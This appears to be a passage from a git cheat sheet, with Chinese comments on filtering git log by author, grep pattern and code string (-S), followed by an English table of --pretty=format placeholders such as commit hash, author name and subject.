# 这将限制提交输出到与任何--author模式和任何--grep模式匹配的提交
# --all-match 会进一步将输出限制为与所有--grep模式匹配的提交
# 仅显示提交添加或删除与字符串匹配的代码的提交
git log -S function_name
Useful options for git log --pretty=format
Option | Description of Output |
---|---|
%H | Commit hash |
%h | Abbreviated commit hash |
%T | Tree hash |
%t | Abbreviated tree hash |
%P | Parent hashes |
%p | Abbreviated parent hashes |
%an | Author name |
%ae | Author email |
%ad | Author date (format respects the –date=option) |
%ar | Author date, relative |
%cn | Committer name |
%ce | Committer email |
%cd | Committer date |
%cr | Committer date, relative |
%s | Subject |